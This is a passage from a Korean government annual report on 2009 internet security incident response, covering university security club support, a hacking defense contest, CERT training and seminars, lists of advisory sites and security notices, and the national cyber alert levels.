27명참석 (12개동아리18 명수료) 서경강권역 9개동아리 24명참석 (8개동아리19 명수료) 총 332 명참석(277 명수료) - 176 -

(2) 대학동아리정보보호소양교육실시 대학동아리에서수행하고있는프로젝트를효과적으로수행하고, 다양한 문서작성방법등에대한교육을통해동아리연구성과물의품질향상 도모및사이버윤리의식강화를위해소양교육을실시하였다. 이번교육에서는 정보보호의필요성및분야별소개, 사이버범죄및 정보보호윤리의식, 기술적인글쓰기를위한문서작성의비법 등에대한 내용으로실시되었다. (3) 대학동아리정보보호세미나활동활성화 대학정보보호동아리연합회(KUCIS) 운영진이주도하여권역별정보보호 세미나를총 8 회개최하였다. 정보보호세미나는대학동아리의정보보호 연구주제발표수준을한층높이고, 동아리간정보교류가활발해지는 계기를마련하였다. [ 표 5-3] KUCIS 정보보호세미나추진실적 회차일정권역장소참석현황 1 5.5( 화) 서울경기강원권역숙명여대 30개동아리346 명총 ( 359 명참석) 2 5.16( 토) 충청권역충남대 16개동아리 94 명총 ( 98 명참석) 3 5.23( 토) 영남권역창원대 13개동아리174 명총 ( 176 명참석) 4 5.30( 토) 호남권역조선대 11개동아리 84 명총 ( 88 명) 참석 5 10.10( 토) 영남권역영남대 16개동아리110 명총 ( 111 명) 참석 6 10.31( 토) 서울경기강원권역서울여대 25개동아리145 명총 ( 153 명) 참석 7 11.07( 토) 호남권역원광대 6개동아리 58 명총 ( 59 명) 참석 8 11.14( 토) 충청권역순천향대 10개동아리 63 명총 ( 64 명) 참석 - 177 -

라. 대학동아리정보보호우수동아리선정 2009년대학정보보호동아리지원사업에참여한35개동아리를대상으로 정보보호경진대회, 온누리캠페인, 프로젝트보고서등진흥원에서주관한 행사참여도에초점을맞추어총 평가가진행되었다. 18개세부항목에대하여년간수시로 올해최우수동아리로는 동명대학교 Think 가선정되었다. 동명대학교 Think 는 2006 년부터지원사업에참여하고있으며, 정보보호경진대회 정책아이디어제안부분최우수상및부산지역온누리캠페인, 권역세미나 등다양한분야에서두각을나타내어최우수동아리로선정되었다. 이외에우수동아리로는우수상 2 팀에영남대 @Xpert, 조선대 HackerLogin, 장려상 3팀에는전남대정보보호119, 동서대 CNLS 연구회, 창원대 Casper가 선정되었다. 또한국립경찰대 CRG는우수한프로젝트를수행했다는평가를 받아특별상에선정되었다. 우수동아리시상식은 12월 21 일에개최되었으며, 진흥원원장상및부상이 주어졌다. 바.2009년도대학정보보호동아리워크숍개최 2009년도동아리대표및 2010년도차기동아리대표들이참석하여 2009 년도연간동아리활동결과공유및발전방향협의를위한워크숍을 개최(12월 21 일~22 일) 하였으며, 총 32개동아리에서 73 명이참석하였다. 이번워크숍에서는 동아리연구프로젝트, 2009 년도지원사업의주요성과및동아리평가결과, 기술문서등에대한종합평가의견에대하여 발표함으로써금년도사업에대한총결산의시간이마련되었으며, 동아리 에서수행한연구성과물중우수프로젝트 ( 윈도우레지스트리에대한 포렌식관점의분석) 및기술문서(For Imagine a cellphone interceptor ) 를 발표함으로써참석한학생들에게큰호응을얻었다. - 178 -

또한,2009년도동아리대표및 2010년도차기동아리대표등으로분임조를 구성하여차기년도지원사업관련의견수렴및대학동아리발전방안에 대한토론이진행되었다. 3. 결론 2006년부터진흥원에서는대학정보보호동아리의기술적역량강화를위하여동아리학생들의다양한수준을고려한맞춤형교육을실시하고, 각종경진대회에입상한우수동아리에게는해외컨퍼런스참가지원을통해지원동아리의기술력향상과해외최신동향을직접체험할수있는기회를제공하였다. 특히 2009년도에는 35 개대학정보보호동아리를대상으로, 웹해킹및 대응방법등정보보호기술교육과정보보호윤리의식함양을위한소양 교육을실시하였으며, 보안기술분야및정책분야에대한정보보호경진 대회를통해최우수입상자들에게해외정보보호컨퍼런스참가기회를 제공하였다. 또한동아리별정보보호연구활동장려를위해프로젝트수행 및연구활동을위한전문서적ㆍ소프트웨어등을지원하였다. 향후에는대학정보보호동아리가스스로정보보호전문가로서필요한 자질을갖추는일외에도, 정보보호인식제고및정보보호소외계층지원등 사회에공헌을할수있는정보보호동아리가되도록지원할예정이다. - 179 -

제 3 절해킹방어대회개최 1. 개요 대응센터에서는 04년부터보안전문가들의해킹방어능력향상을위해서 매년해킹방어대회를개최하고있으며공격기법보다는시스템방어, 침해 시스템분석을진행하여참석자들의해킹기법을겨루는대회와는다른성격을 가지고있다.6회대회를치루면서명실상부한국내최고의대회로인정받고 있다. 2. 세부진행내용 가. 예선대회 o 일시 : 2009. 5. 6 ~ 7(AM 10:00 ~PM 10:00 양일간) o 예선장소 : 온라인접속을통한문제해결(http://answer.hdcon.or.kr) o 접수현황 : 173개팀 522명 [ 표 5-4] 2008년해킹방어대회접수현황 분류 팀수 사람수 고등학생 5 16 대학생 43 111 일반 72 173 대학동아리 64 229 합계 184 529 o 본선선발기준 : 가장높은단계를통과한순서로상위 10개팀 - 180 -

나. 본선대회 o 장소 : 한국과학기술회관국제회의실 o 일시 : 2009년 5월 13일오전 9:00 ~ 오후 6:00 o 참가팀 : 예선통과 10개팀 35 명 (teamx팀 - 1 명불참) [ 표 5-5] 본선대회순위 본선순위 예선순위 팀명 팀구분 1 1 zzzz 일반 2 10 GoN 대학생 (KAIST) 3 4 JAMBa 일반 4 5 asdf 대학생( 서울시립대) 5 2 PLUS 대학생( 포항공과대) 다. 참여형대회운영 해킹방어는일부전문가의영역이아니고누구나할수있는것이라는 인식을심어주기위해일반인들도모두참가하는대회로운영하였다. 침해 사고가발생한 PC 를분석하는 " 나도분석전문가" 코너를운영하고, 누구나 참가할수있는 " 개방형해킹방어대회( 오픈 CTF)" 를통해참가자의적극적 참여를유도하였다. 라.2010년해킹방어대회운영계획 일반기업에서체감할수있는문제와참여행사를더욱확대해모두가참여하는대회로확대할예정이다. 이번대회를통해확인된해킹방어에대한참여열기를반영하여일반인참가이벤트를확대해서운영하고, 국내외최고의보안전문가들과보안현안과대응방법을토론하는최고의행사로확대할예정이다. - 181 -

제 4 절침해사고예방교육및세미나 1. 사례중심의최신해킹동향및대응기술세미나 가. 개요 최근들어금전적인이득을노리는 DDoS 등의최근해킹기술동향및대응기술발표를통해해킹대응기술전파와서버담당자보안의식향상도모하기위해대응센터에서는사례중심의최신해킹동향및대응기술세미나를개최하였다. 나. 세부진행내용 o 사례중심의최신해킹동향및대응기술세미나 o - 행사일시 : 09년 6월 24 일( 수), 13:00 ~ 17:00 - 행사장소 : 건국대학교새천년관국제회의장 - 참석인원 : 총 136명 교육내용 ( 상반기) [ 표 5-6] 상반기해킹동향및대응기술세미나교육내용 내용발표자 o 인사말 okiscddos 대응현황 KISA KISA o 유무선통합접근제어를이용한침입대응방안 owindows7개발자보안과호환성 UNET MS o 09개인정보의기술적관리적보호조치기준 KISA oddos 위협의실체와효과적대응방안 다음 o 패널토의 : DDoS 공격, 그대응책은? - - 182 -

o 사례중심의최신해킹동향및대응기술세미나 o - 행사일시 : 09년 12월 2 일( 수), 12:30 ~ 17:30 - 행사장소 : 부산 Bexco APEC홀 - 참석인원 : 총 260명 교육내용 ( 하반기) [ 표 5-7] 하반기해킹동향및대응기술세미나교육내용 내용발표자 o 인사말 KISA o 홈페이지해킹및 DDoS 현황과대응 KISA o 무선네트워크보안 o 윈도우피해시스템분석방법 owindows7개발자보안과호환성 o 악성봇기술발전및대응 보안연구회 HSD KISA MS KISA oad와 SMS를이용한사내보안통제코스콤 다. 추진결과및향후계획 최근이슈가되고있는홈페이지내에악성코드삽입과관련하여 홈페이지보안에대한관심이커짐에따라, 예상보다많은인원이본세미나에 관심을나타내었다. 전체내용또한실제시스템운영자및개발자에게 실질적으로도움이되는내용으로구성되어세미나를마칠때까지끝까지 자리를지키는모습을보여주었다. 설문조사결과일부참석자는어느정도보안을적용하고있는관리자들을위하여한가지테마정도는보다심도있게다루어주기를원했으며, 발표자에게질문또는토론하는시간을많이할애하여궁금증을현장에서풀수있도록요구하였다. 추후에는이러한요구사항을반영하고보다많은인원이세미나에참여할수있도록개최할예정이다. - 183 -

2. 침해사고대응팀(CERT) 구축및운영교육 가. 개요 민간침해사고대응팀(CERT) 구축 운영지원및국내 CERT 역량강화를 위하여중소기업및대학교에서 대상으로 CERT 구축및운영교육을실시하였다. CERT를구축하거나준비중인기관을 나. o 세부진행내용 교육기간및참석현황 회차교육기간참석현황 1차 6. 11( 월) ~ 12( 화) 총 22명참석 2차 9. 7( 목) ~ 8( 금) 총 31명참석 o 교육장소 : 지식정보보안아카데미 o 교육대상 : 중소기업/ 대학( 교) 등보안실무담당자 o 교육프로그램 구분시간교육내용강사 1 일차 2 일차 침해사고대응및역할 - 국내 외침해사고대응협력현황 10:00~12:00 -KrCERT/CC모의훈련개요및소개등 -CERT인력관리및역할 12:00~13:00 중식 13:00~15:00 침해사고대응절차및분석방법 15:00~17:00 정보보호와사이버범죄 09:30~12:00 12:00~13:00 중식 [Case Study Ⅰ] 침해사고분석 : 유닉스시스템분석 13:00~15:00 침해사고분석 : 윈도우시스템분석 [Case Study Ⅱ] 15:00~17:00 네트워크포렌식 -IIS 웹서버분석, 17:00~17:30 설문지작성 윈도우시스템분석등 KrCERT/CC / 박태원주임 KrCERT/CC / 김지상선임 대검찰청전완근수사관 KrCERT/CC / 박문범연구원 KrCERT/CC / 전은국주임 KrCERT/CC / 서완석주임 - 184 -

다. 추진결과및향후계획 CERT 구축 운영에필요한이론및침해사고분석, 침해사고대응절차 수립에대한실습을통하여 CERT 업무절차에대한이해도를증진시켰다. 향후변화하는침해사고유형을파악하여현업에서침해사고에있어선 제적예방및사고발생시신속하게처리를할수있도록프로그램으로보 완하여운영할계획이다. ( 그림 5-3) CERT 구축및운영교육 3. 제13회해킹방지워크샵 가. 개요 해킹방지워크샵은침해사고대응팀(CERT) 을구축 운영하는기업또는 기관들의정보보호와관련된이슈에대한사례와경험을공유하며토론 하는공간으로매년한국침해사고대응팀협의회 (CONCERT : CONsortium of CERTs) 와공동으로개최하고있으며, 금년에13 회를맞이하였다. - 185 -

나. 세부진행내용 o 일시 : 2009. 11. 17( 화)~18( 수), 2일간 o 장소 : 서울교육문화회관 2F 가야금홀 o 공동주관 : 한국인터넷진흥원, 한국침해사고대응팀협의회 o 기관후원 : 방송통신위원회, 경찰청사이버테러대응센터, 금융감독원, 금융결제원, 한국전자통신연구원 o 참석자: 211개기관총610여명참석( 제품전시부스관계자미포함) 다. 추진결과및향후계획 금번워크샵은진흥원, 민 관합동조사단전문가, CONCERT 회원사들 로부터사전에발표주제를공모하고, 수준이향상되었다는평가를받았다. 주제를선정하였다는점에서발표 워크샵의주요프로그램구성으로는 보안담당자의생존전략, DDoS Exit Strategy, Wild Wild Web 등 4개의메인트랙으로구성하여총 20 여개의주제가발표되었다. 특히최근기업정보보호담당자의역할과법적책임이강조되고있는 가운데, 첫째날소개되는 보안담당자의생존전략 트랙에서는정보보호 수준측정과법적책임범위등을주제로기업정보보호담당자들의나아갈 방향을제시되었고, 둘째날 DDoS Attack Exit Strategy 트랙에서는 기업정보보호담당자들에게가장큰이슈가되고있는 DDoS 공격에 대해그동안소개되지않았던다양한대응방안을소개함으로써기업 정보보호담당자들의실무에큰도움을제공하였다. 이밖에도대형시스템의내부감염위험과내부 자산보호를위한 다양한방안이 Turn Around Inside 트랙에서소개되며, Wild Wild Web 트랙에서는최근등장하는정보보호이슈를다루었다. IT - 186 -

지난해큰호응을얻었던 Debate Track' 에서는 대량웹사이트운영에 필요한보안실무, 최근 ISP 보안위협현황및대응방안 등특정 주제에대해심도있는경험과의견을교환함으로써일방적인강의가 아닌치열한토론을통해참석자들공통의결론을이끌어낸다는점에서 참석자들의높은호응을얻었다. 행사후참석자들에게조사한만족도설문조사결과에서스팸 Botnet 및프리서버 DDoS 사례( 최근 ISP 보안위협현황및대응방안) 와같이 실제사례를다룬주제발표에높은관심을보여향후유사행사개최시 본결과를적극반영할수있도록계획할것이다. 또한, 사이버공간에서의정보보호는가장중요한화두이며, 이문제를 풀어가야할전문가는방어의최전선에서있는기업정보보호담당자들인 만큼정보보호담당자들에게충분한의견수렴을통해매년기업정보보호 담당자들이단순히지식을공유하는것이아닌지혜를나누는공간으로 마련할예정이다. ( 그림 5-4) 제13회해킹방지워크샵 - 187 -

제 6 장결론 2003년 1.25 인터넷대란이후, 2006년중국발해킹사건및온라인게임 주민번호도용사건과 2007, 2008년대규모개인정보유출사건등인터넷상 에서는지속적으로침해사고가발생하여왔다.2009년도역시 7.7DDoS가 발생하여청와대를비롯한정부기관과금융기관, 포탈사이트등사회적 파급효과가큰사이트들에접속장애가발생하는등보안전문가들의전문 용어였던 DDoS 란단어를전국민에게각인시켜주었다. 사회적혼란및 피해가컸던만큼정보보호의중요성도일깨워준계기가되었다. 7.7 DDoS 침해사고에서도알수있듯이최근의사이버공격은갈수록 고도화, 지능화되어가고있으며, 금전적이익달성을위해조직화되고 있다. 또한자동화된악성코드제작및공격도구의일반화, 사회공학 기법을포함한전파경로의확대로공격성공가능성을높이고, 자기은폐 기술의진화등생존력을높이기위한기술로무장하여악성코드의대응및 치료가어렵게진화 발전하고있다. USN, 광대역통합망(BcN) 등의정보통신인프라구축과 Wibro, 4G 등의 신규 IT서비스가 제공 활성화되는등유비쿼터스를넘어스마트컴퓨팅 시대가한층다가오고있다. 이렇듯고도화되는 IT기술을바탕으로편리 하고새로운서비스를추구하는사용자의요구에의해기존서비스들을 융합한새로운서비스(Mash-up) 점점가속화될것이다. 출현및광대역융합망으로의통합이 이러한환경변화는침해사고의영역이생활의모든영역으로확대될수 있음을의미하는것으로, 보호대상이기하급수적으로증가하고침해사고로 인한피해전파및범위도비례하여커질수있다. 이러한사이버위협을 - 188 -

사전에예방하고신속하게대응하기위하여정부, 기업, 그리고일반 이용자의보안에대한관심과주의가그어느때보다절실하며, 통해안전한사이버이용환경이이루어질수있기를기대해본다. 이를 - 189 -

참고사이트 [1] Virus Chaser http://www.virusdesk.com [2] AhnLab http://home.ahnlab.com [3] CERT http://www.cert.org http://www.us-cert.gov [4] Zeroday Initiative http://www.zerodayinitiative.com/advisories/published/ [5] CISCO http://www.cisco.com [6] CNET http://news.com.com [7] EEYE http://www.eeye.com [8] GreyMagic http://www.greymagic.com [9] Hauri http://hauri.co.kr [10] Internet Health Report http://scoreboard.keynote.com/scoreboard/ [11] ISS https://gtoc.iss.net [12] KrCERT http://www.krcert.or.kr [13] Mcafee http://us.mcafee.com [14] MessageLabs http://www.messagelabs.com - 190 -

[15] Microsoft http://www.microsoft.com [16] Mitre http://www.cve.mitre.org [17] PacketStorm http://packetstormsecurity.org [18] SANS http://isc.sans.org [19] Secunia http://www.secunia.com [20] SecurityFocus http://www.securityfocus.com [21] Security Wizardry http://securitywizardry.com/radar.htm [22] Sophos http://sophos.com [23] Symantec http://securityresponse.symantec.com [24] TrendMicro http://www.trendmicro.co.kr [25] Internet Security Systems http://xforce.iss.net [26] ZONE-H http://www.zone-h.org [27] MILW0RM http://www.milw0rm.com [28] Anti-Phishing.org http://www.anti-phishing.org - 191 -

부 록 부록 A. 운영체제별보안권고문및패치배포사이트목록 부록 B. 2009년보안공지문현황 부록 C. 경보체계 부록 D. 해킹 바이러스대응기관연락처 부록 E. MS 윈도우취약점패치발표현황 - 192 -

부록 A. 운영체제별보안권고문및패치배포사이트목록 A-1. 운영체제별패치및보안권고문사이트 운영체제 MS Windows 패치/ 보안권고문사이트주소 패치/ 보안권고문 http://www.microsoft.com/technet/security/current.aspx Apple Mac 패치/ 보안권고문 http://www.apple.com/support/security SunOS 패치/ 보안권고문 http://sunsolve.sun.com RedHat Linux 패치/ 보안권고문 http://www.redhat.com/security IBM AIX 패치 ftp://aix.software.ibm.com/aix/efixes/security HP-UX 패치 http://us-support2.external.hp.com SGI 패치 ftp://ftp.sgi.com/security FreeBSD 패치 보안권고문 http://security.freebsd.org/patches ftp://ftp.freebsd.org/pub/freebsd/errata/notices SCO 보안권고문 ftp://ftp.sco.com/pub/security CISCO 패치/ 보안권고문 http://www.cisco.com/en/us/products/products_security_a dvisories_listing.html - 194 -

A-2. 기타보안권고문제공사이트 사이트명 패치/ 보안권고문사이트주소 US-CERT 보안권고문 http://www.us-cert.gov SecurityFocus 보안권고문 http://www.securityfocus.com Secunia 보안권고문 http://www.secunia.com VUPEN 보안권고문 http://www.vupen.com/english PacketStorm 보안권고문 http://www.packetstormsecurity.org Internet Security Systems 보안권고문 http://xforce.iss.net SANS 보안권고문 http://isc.sans.org/index.php?on=diary eeye 보안권고문 http://www.eeye.com/html/research/advisorie s/index.html - 195 -

부록 B. 2009년보안공지문현황 번호날짜제목 1 1/14 [MS 보안업데이트]2009년 1월 MS 정기보안업데이트 2 1/16 2009년 1월 Oracle Critical Patch Update 권고 3 1/23 MS08-067 취약점악용악성코드감염주의 4 2/10 USB를통하여전파되는악성코드피해주의 5 2/11 [MS 보안업데이트]2009년 2월 MS 정기보안업데이트권고 6 2/11 국내공개웹게시판보안업데이트공지 7 2/12 PC 시간을변경하는 2090 악성코드피해주의요망 8 2/19 Internet Explorer 7 취약점(MS09-002) 악용악성코드주의 9 2/20 이메일을통한악성코드감염주의 10 2/20 Adobe Reader/Acrobat 신규취약점으로인한피해주의 11 2/25 MS Excel 신규원격코드실행취약점으로인한피해주의 12 2/26 Adobe Flash Player 다중취약점보안업데이트권고 13 3/11 [MS 보안업데이트]2009년 3월 MS 정기보안업데이트권고 14 3/11 Adobe Reader/Acrobat 신규취약점보안업데이트권고 15 3/27 Conficker 변종악성코드감염으로인한피해주의 16 4/3 MS PowerPoint 신규취약점으로인한피해주의 17 4/15 [MS 보안업데이트]2009년 4월 MS 정기보안업데이트권고 18 4/16 2009년4월Oracle의Oracle Critical Patch Update 권고 19 4/21 IE 브라우저비정상종료로인한피해주의 20 4/23 메신저해킹피해주의 21 4/29 Adobe Reader (getannots() 등취약점으로인한피해주의 ) 22 5/13 [MS 보안업데이트]2009년 5월 MS 정기보안업데이트권고 23 5/19 Microsoft IIS(5,5.1,6) WebDAV 취약점으로인한피해주의 24 5/29 Microsoft DirectShow의취약점으로인한피해주의 25 6/10 [MS 보안업데이트]2009년 6월 MS 정기보안업데이트권고 - 196 -

26 6/12 Adobe Acrobat/Reader 다중취약점보안업데이트권고 27 6/24 스팸메일을발송하는악성코드감염주의 28 7/7 MS 비디오스트리밍 ActiveX 컨트롤취약점주의 29 7/8 신종 DDoS 공격에따른 " 주의" 경보발령 30 7/9 [ 긴급공지] 특정악성코드로인한 PC포맷문제 31 7/10 긴급!DDoS관련좀비PC하드디스크손상주의 32 7/14 MS Office Web Components ActiveX 컨트롤취약점주의 33 7/15 [MS 보안업데이트]2009년 7월 MS 정기보안업데이트권고 34 7/17 2009년 7월 Oracle Critical Patch Update 권고 35 7/23 Adobe Flash Player/Acrobat/Reader 신규취약점주의 36 7/29 [MS 긴급보안업데이트] Internet Explorer 관련패치등 2개 37 7/29 BIND Dynamic Update DoS 취약점보안업데이트권고 38 7/29 [ 긴급]ATL 개발자를위한보안권고사항 39 7/31 Adobe Flash Player 다중취약점보안업데이트권고공지 40 8/12 [MS 보안업데이트]2009년 8월 MS 정기보안업데이트권고 41 9/2 MS IIS FTP 서비스의원격코드실행취약점주의 42 9/9 [MS 보안업데이트]2009년 9월 MS 정기보안업데이트권고 43 9/9 Microsoft Windows SMB2 원격코드실행취약점주의 44 9/17 7.7 DDoS 공격소멸에따른경보단계조정( 관심 정상) 45 9/22 제로보드 4.1pl9 신규취약점및배포 서비스중지에따른주의 46 10/9 Adobe Reader/Acrobat 신규취약점으로인한피해주의 47 10/14 [MS 보안업데이트]2009년 10월 MS 정기보안업데이트권고 48 10/18 MS Windows 부팅불능악성코드감염주의 49 10/22 2009년 10월 Oracle의 Oracle Critical Patch Update 권고 50 11/11 [MS 보안업데이트]2009년 11월 MS 정기보안업데이트권고 51 11/16 Microsoft Windows SMB 취약점으로인한피해주의 52 11/23 MS IE Style Object 제로데이취약점으로인한피해주의 53 12/9 [MS 보안업데이트]2009년 12월 MS 정기보안업데이트권고 - 197 -

54 12/10 Adobe Flash Player 및Air 다중취약점보안업데이트권고 55 12/16 Adobe Reader/Acrobat 신규취약점으로인한피해주의 56 12/28 MS IIS 파일확장자처리오류취약점주의 - 198 -

부록 C. 경보체계 한국인터넷진흥원인터넷침해대응센터(KISC) 는정보통신망이용촉진및 정보보호등에관한법률( 법률제9637 호) 제48조의 2항에근거하여웜바이러스 및보안취약점정보, 침해사고경보를발령하고있다. 국내인터넷트래픽상태등을종합하여인터넷 정보통신망이용촉진및정보보호등에관한법률제2조 제2 조 ( 정의) 1이법에서사용하는용어의정의는다음과같다. 7. 침해사고 라함은해킹, 컴퓨터바이러스, 논리폭탄, 메일폭탄, 서비스 거부또는고출력전자기파등에의하여정보통신망또는이와관련된 정보시스템을공격하는행위로인하여발생한사태를말한다. 정보통신망이용촉진및정보보호등에관한법률제48조의2( 침해사고의대응등) 제48조의2( 침해사고의대응등) 1 방송통신위원회는침해사고에적절히대응하기위하여다음각호의 업무를수행하고, 필요하면업무의전부또는일부를한국인터넷진흥 원이수행하도록할수있다. 1. 침해사고에관한정보의수집 전파 2. 침해사고의예보 경보 3. 4. 침해사고에대한긴급조치 그밖에대통령령이정하는침해사고대응조치 2 다음각호의 1에해당하는자는대통령령으로정하는바에따라침해 사고의유형별통계, 당해정보통신망의소통량통계및접속경로별 이용통계등침해사고관련정보를방송통신위원회나진흥원에제공하여 야한다. 1. 2. 3. 주요정보통신서비스제공자 집적정보통신시설사업자 그밖에정보통신망을운영하는자로서대통령령이정하는자 3 한국인터넷진흥원은제2항의규정에의한정보를분석하여방송통신위원회에 보고하여야한다. - 199 -

C-1. 경보의정의 가. 정의 경보는해킹, 웜/ 바이러스, 기타침해사고로인하여국내민간부문인터넷망에 영향을주거나, 일반의인터넷사용에지장을주거나크게우려되는경우침해 사고예방및피해최소화를위하여방송통신위원회및한국인터넷진흥원이 발령하는대국민안내 나. 단계 [ 표 1] 경보단계 구분판단기준비고 관심 (Blue) o 위험도가높은웜ㆍ바이러스, 취약점, 해킹기법및공격코드출현으로인해피해가능성증대 o 해외에서침해사고확산또는일부국내유입및확산가능성증대 o 국내인터넷이상트래픽발생가능성증대 징후감시 주의 (Yellow) o 웜ㆍ바이러스, 해킹등으로국지적피해발생 o 국지적인인터넷소통장애, 주요인터넷관련서비스에장애가발생되거나매우우려되는경우 oisp/idc, 일반사용자, 기업등의긴급대응및보안태세강화가필요 보안강화 경계 (Orange) o 복수 ISP망또는주요정보통신기반시설의피해발생 o 해킹및신종위협으로주요기업및포털, 연구소등민간부문에중대한피해발생 o 웜ㆍ바이러스, 해킹등침해사고로민간부문에다수기업, 이용자등피해발생 o 상황해결을위해민 관각분야의협조및공동대응이필요한상황 긴급대응 심각 (Red) o 국내인터넷전분야에소통장애발생 o 주요정보통신기반시설의피해로대국민서비스지장발생 o 민간부분전반에대규모침해사고피해발생 o 국가적차원에서공동대처해야할필요성이있는상황 전면대응 위험정도가낮은웜ㆍ바이러스, 해킹기법, 보안취약점이발견된경우는위기경보이전단계인 정상 (Green) 수준으로간주 - 200 -

C-2. 경보체계 가. 발령주체 o 관심 경보는한국인터넷진흥원( 인터넷침해대응센터) 에서발령 o 방송통신위원회를통하여국가정보원및국방부와사전협의 주의 경보는한국인터넷진흥원( 인터넷침해대응센터) 에서발령 방송통신위원회를통하여국가정보원및국방부와사전협의 o 경계 경보는방송통신위원회에서발령 방송통신위원회에서국가위기상황센터, 국가정보원, 국방부와사전협의 o 심각 경보는방송통신위원회에서발령 방송통신위원회에서국가위기상황센터, 국가정보원, 국방부와사전협의 [ 표 2] 경보발령주체 구분단계발령주체 정상단계 o 한국인터넷진흥원인터넷침해대응센터 o 한국인터넷진흥원 경보단계 o 한국인터넷진흥원 o 방송통신위원회 o 방송통신위원회 경보체계는종전 정상, 주의, 경고, 위험 에서 2005년 1 월부터 정상, 관심, 주의, 경계, 심각 5 단계로변경되었으며, 예보체계를없애고정상과경보 단계로구분함 정상(Green) 단계에서웜 바이러스및보안취약점에대한보안권고등은 한국인터넷진흥원인터넷침해대응센터에서알림 - 201 -

나. 발령체계 (1) 국가사이버안전위기대응종합체계도 ( 그림 1) 국가위기관리체계도 (2) 민간분야위기관리체계도 ( 그림 2) 민간분야위기관리체계도 - 202 -

(3) ISP 등민간분야비상대응체계 ( 그림 3) 민간분야비상대응체계 (4) 민간분야경보발령체계 ( 그림 4) 민간부문경보발령체계도 - 203 -

다. 경보발령과정 경보는 정보의수집 탐지 분석 협의 전파 발령 대응복구 의순서로이루어진다. ( 그림 5) 경보발령과정 o 수집 탐지 : 국내외인터넷트래픽및취약점정보, 백신업체및 S/W 벤더등으로부터인터넷트래픽통계및웜 바이러스정보 등침해사고관련정보를수집탐지하는과정 o 분석 협의 : 수집된정보를자동및수동분석하고협의하여인터넷 경보단계를결정하는과정 o 전파 발령 : 경보상태를다양한전파수단을이용하여알림으로써 침해사고를사전예방하고사고발생시신속히대응하는과정 o 대응 복구 : 과정 침해사고피해원인을분석하고피해시스템을복구하는 - 204 -